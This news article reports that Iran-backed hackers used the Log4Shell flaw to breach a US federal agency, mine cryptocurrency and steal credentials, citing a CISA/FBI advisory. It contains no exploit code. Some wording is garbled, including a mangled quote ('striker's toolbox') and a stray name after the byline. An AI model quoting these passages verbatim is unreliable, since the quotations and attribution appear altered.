Iranian hackers use Log4Shell to mine crypto on federal computer system

Written by AJ Vicens

Hackers with ties to the Iranian government broke into a US government agency’s network in early 2022, using a well-known flaw in an open source software library to install cryptocurrency mining software and compromising credentials, federal cybersecurity officials said Wednesday.

Exploiting the Log4Shell vulnerability, Iranian-backed hackers broke into an unpatched VMware Horizon server in February and then used that access to move laterally within an unidentified federal agency’s network, according to the report. Wednesday’s joint advisory from the Department of Homeland Security’s Cybersecurity. and Infrastructure Security Agency and the Federal Bureau of Investigation.

On Thursday, the Washington Post reported that the agency involved was the US Merit Systems Protection Board.

When the Log4Shell vulnerability was discovered late last year, security researchers warned that it would likely be exploited for years. The vulnerability affects open-source software Log4j, which is an almost ubiquitous tool that software developers have bundled into a wide range of software.

Wednesday’s advisory, which comes nearly a year after Log4Shell was discovered, illustrates how difficult it is to fix software vulnerabilities in these widely deployed software packages.

“Log4shell is rampant and will exist forever,” said Dan Lorenc, CEO and co-founder of Chainguard, a supply chain cybersecurity company, on Wednesday. “It will remain in every striker’s toolbox and will continue to be used for access or lateral movement for the foreseeable future.”

Following the disclosure of the flaw in Log4j, CISA ordered agencies under its jurisdiction to perform an emergency remediation operation, and state-backed hackers immediately began searching for vulnerable systems to target. Officials then warned that the sprint to fix vulnerable systems is unlikely to catch all vulnerable software use cases, and Wednesday’s advisory is evidence of the remaining gaps in Log4j’s patching.

Organizations still running vulnerable versions of Log4j should assume they have been hacked, CISA and the FBI said in Wednesday’s advisory.

Iranian hacking groups have relied on unpatched versions of log4j to gain access to a wide variety of sensitive US systems. In February, Iranian hackers gained access to a US aerospace company and a city government’s computer systems using the vulnerability, according to a September notice from US and allied cybersecurity agencies. That notice attributed the activity to groups with ties to Iran’s Islamic Revolutionary Guard Corps.

Wednesday’s notice did not name the group in Iran believed to be responsible for the breach, blaming “Iranian government-sponsored APT actors,” using the acronym Advanced Persistent Threats, which usually refers to activity sponsored by the state or with significant resources. According to the advisory, the attackers relied on common software to exploit the Log4Shell vulnerability and perform the operation, including XMRig, for cryptocurrency mining, PsExec, Mimikatz, and Ngrok.

At times, hackers working on behalf of the Iranian government have been accused of more traditional cybercrime activities, such as ransomware attacks, in operations that have “blurred the lines between electronic crime and espionage”, he said. a researcher told CyberScoop in September. Wednesday’s notice may describe another such operation in which hacking groups – possibly working at arm’s length from the government – mix espionage and cybercrime.

Updated on November 17, 2022: This story was updated after publication to add new information about the US federal agency allegedly hacked by Iran-linked hackers.

Gordon K. Morehouse